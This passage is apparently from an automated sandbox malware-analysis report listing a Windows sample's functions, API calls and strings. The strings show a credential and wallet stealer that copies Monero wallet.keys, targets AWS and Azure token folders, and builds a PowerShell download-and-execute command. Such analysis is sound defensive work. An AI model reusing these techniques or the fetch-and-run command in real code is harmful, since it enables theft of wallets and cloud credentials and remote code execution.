                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 53ffff1005d8b0fe9d62e7cc736886e73f716eda54db37ba4d64fab5d48a0e7d
                              • Instruction ID: 942e64099c5bab7d5227c318ac6ba2aaea62762d2c5931dc17624a0d407e2e54
                              • Opcode Fuzzy Hash: 53ffff1005d8b0fe9d62e7cc736886e73f716eda54db37ba4d64fab5d48a0e7d
                              • Instruction Fuzzy Hash: 77B16E31A1261BABCF20AFB4DD4EA6F7FA8BF85700F144128B945E7251DB74EC418B94
                              Function 005A5BE0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5C15
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005A5C44
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C75
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C9D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5CA8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5CD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5D08
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5D13
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5D38
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5D6E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5D96
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5DA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5DC8
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A5DDA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5DF9
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A5E05
                              • lstrlen.KERNEL32(0160DB88), ref: 005A5E14
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5E37
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A5E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5E6C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A5E98
                              • GetFileAttributesA.KERNEL32(00000000), ref: 005A5E9F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5EF7
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5F66
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5F98
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A5FDB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6007
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A603F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A60B1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A60D5
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: 2b7198e0ed28e6b7d30819cc61be4fba660839a21bbc2062ad5687d64745204a
                              • Instruction ID: 04998dfab56efb282d56d5435de6773a88d8f78daf5f709536d21616d50334ce
                              • Opcode Fuzzy Hash: 2b7198e0ed28e6b7d30819cc61be4fba660839a21bbc2062ad5687d64745204a
                              • Instruction Fuzzy Hash: 6B029071A0261AAFCF21AF68C88DEAE7FB9BF45300F144128F94597251EB34DD85CB90
                              Function 00591070 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00591000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00591015
                                • Part of subcall function 00591000: RtlAllocateHeap.NTDLL(00000000), ref: 0059101C
                                • Part of subcall function 00591000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00591039
                                • Part of subcall function 00591000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00591053
                                • Part of subcall function 00591000: RegCloseKey.ADVAPI32(?), ref: 0059105D
                              • lstrcat.KERNEL32(?,00000000), ref: 005910A0
                              • lstrlen.KERNEL32(?), ref: 005910AD
                              • lstrcat.KERNEL32(?,.keys), ref: 005910C8
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005910FF
                              • lstrlen.KERNEL32(016095F8), ref: 0059110D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591131
                              • lstrcat.KERNEL32(00000000,016095F8), ref: 00591139
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00591144
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591168
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00591174
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059119A
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005911DF
                              • lstrlen.KERNEL32(0160DAC8), ref: 005911EE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591215
                              • lstrcat.KERNEL32(00000000,?), ref: 0059121D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591258
                              • lstrcat.KERNEL32(00000000), ref: 00591265
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059128C
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005912B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 005912E1
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059131D
                                • Part of subcall function 005AEF30: lstrcpy.KERNEL32(00000000,?), ref: 005AEF62
                              • DeleteFileA.KERNEL32(?), ref: 00591351
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: 10e713bd2c4481e6d2c5cee9c700c2c3babb0601c5eb29e46710b416cee8d2b3
                              • Instruction ID: 7862a5530c3e69373c3bd4ec5fea31d1f1d3721692ac32eca37945edcb76c4a7
                              • Opcode Fuzzy Hash: 10e713bd2c4481e6d2c5cee9c700c2c3babb0601c5eb29e46710b416cee8d2b3
                              • Instruction Fuzzy Hash: DFA15F71A1161BABCF10ABB5DC4DAAE7FB8BF44700F444428F905E7251DB34ED418BA9
                              Function 005AE880 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 200stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 005AE8A1
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005AE8CE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE900
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE90C
                              • lstrcat.KERNEL32(?,\.azure\), ref: 005AE923
                              • memset.MSVCRT ref: 005AE961
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005AE98C
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AE9C0
                              • lstrcat.KERNEL32(?,00000000), ref: 005AE9CC
                              • lstrcat.KERNEL32(?,\.aws\), ref: 005AE9E3
                              • memset.MSVCRT ref: 005AEA21
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005AEA51
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AEA82
                              • lstrcat.KERNEL32(?,00000000), ref: 005AEA8E
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 005AEAA5
                              • memset.MSVCRT ref: 005AEAE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$memset$FolderPathlstrcpy
                              • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 4067350539-3645552435
                              • Opcode ID: f13c260db7aeacf8118332092970e80d80f27dffae9224ff47949370abfc4565
                              • Instruction ID: e0f49ed3c3afdcd7fedc2ed0c388f890efe32008437a08527ad3e291e30deccf
                              • Opcode Fuzzy Hash: f13c260db7aeacf8118332092970e80d80f27dffae9224ff47949370abfc4565
                              • Instruction Fuzzy Hash: 3961A631614315BFD760EBA4DC4FFDE7BA4FFC4700F408818B68997181EA74A9498796
                              Function 005B4800 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,005A7741), ref: 005B4806
                              • GetProcAddress.KERNEL32(00000000,connect), ref: 005B481C
                              • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 005B482D
                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 005B483E
                              • GetProcAddress.KERNEL32(00000000,htons), ref: 005B484F
                              • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 005B4860
                              • GetProcAddress.KERNEL32(00000000,recv), ref: 005B4871
                              • GetProcAddress.KERNEL32(00000000,socket), ref: 005B4882
                              • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 005B4893
                              • GetProcAddress.KERNEL32(00000000,closesocket), ref: 005B48A4
                              • GetProcAddress.KERNEL32(00000000,send), ref: 005B48B5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                              • API String ID: 2238633743-3087812094
                              • Opcode ID: 606a35de01a6a74a4b7809bc9495fcd8f796cc8fc3e4429ba5b1f86b3e901a45
                              • Instruction ID: e056fb39e500397797963f217e2057ddbfef7961149e99f3914a97ce6b94f50a
                              • Opcode Fuzzy Hash: 606a35de01a6a74a4b7809bc9495fcd8f796cc8fc3e4429ba5b1f86b3e901a45
                              • Instruction Fuzzy Hash: 24116671951721EF87909BF4AC4DF5A3FF8FA19785308881EB251D2160FAB860C0EB99
                              Function 005ABE80 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005ABEB3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005ABEE6
                              • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 005ABEF1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ABF11
                              • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 005ABF1D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ABF40
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005ABF4B
                              • lstrlen.KERNEL32(')"), ref: 005ABF56
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ABF73
                              • lstrcat.KERNEL32(00000000,')"), ref: 005ABF7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005ABFA6
                              • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 005ABFC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ABFE8
                              • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 005ABFF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AC01A
                              • ShellExecuteEx.SHELL32(?), ref: 005AC06C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 4016326548-898575020
                              • Opcode ID: 5f1e44fd4866449f7e862682593be2b2d1b2e072e8b4edac5c2a7c70955427c2
                              • Instruction ID: d63400d371e12b93b960b6570766a55ba7d2e46ea23f0378e366d40b99d09b28
                              • Opcode Fuzzy Hash: 5f1e44fd4866449f7e862682593be2b2d1b2e072e8b4edac5c2a7c70955427c2
                              • Instruction Fuzzy Hash: B1617171A1121AAFDF21AFB58C8DAAF7FB8BF45700F044429F905D7212EB34D9458B91
                              Function 005AAC12 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32 ref: 005AAC2F
                              • lstrlen.KERNEL32(0160E580), ref: 005AAC45
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAC6D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AAC78
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AACA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AACE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AACEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAD17
                              • lstrlen.KERNEL32(005C509C), ref: 005AAD31
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAD53
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 005AAD5F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAD88
                              • lstrlen.KERNEL32(005C509C), ref: 005AAD9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AADBC
                              • lstrcat.KERNEL32(00000000,005C509C), ref: 005AADC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AADF1
                              • lstrlen.KERNEL32(0160E6B8), ref: 005AAE07
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAE2F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AAE3A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAE63
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AAE9F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005AAEA9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AAECF
                              • lstrlen.KERNEL32(00000000), ref: 005AAEE5
                              • lstrcpy.KERNEL32(00000000,0160E568), ref: 005AAF18
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen
                              • String ID:
                              • API String ID: 2762123234-0
                              • Opcode ID: b527965a936196afd83c76ad3cc01b1e7a7a5a3d565698d2f564eb421011e984
                              • Instruction ID: a478ba070e1284e4f21ed8654348980d86bd901f16bd980985f895261a4ccddc
                              • Opcode Fuzzy Hash: b527965a936196afd83c76ad3cc01b1e7a7a5a3d565698d2f564eb421011e984
                              • Instruction Fuzzy Hash: 79B13C3091261BABDB21EBA4CC4DAAF7FB9FF81701F044528B91597261DB38DD41CB91
                              Function 005B1800 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005B182F
                              • lstrlen.KERNEL32(015F6ED8), ref: 005B1840
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1867
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1872
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B18A1
                              • lstrlen.KERNEL32(005C5568), ref: 005B18B3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B18D4
                              • lstrcat.KERNEL32(00000000,005C5568), ref: 005B18E0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B190F
                              • lstrlen.KERNEL32(015F6D88), ref: 005B1925
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B194C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1957
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1986
                              • lstrlen.KERNEL32(005C5568), ref: 005B1998
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B19B9
                              • lstrcat.KERNEL32(00000000,005C5568), ref: 005B19C5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B19F4
                              • lstrlen.KERNEL32(015F6DA8), ref: 005B1A0A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1A31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1A3C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1A6B
                              • lstrlen.KERNEL32(015F6DB8), ref: 005B1A81
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1AA8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005B1AB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005B1AE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
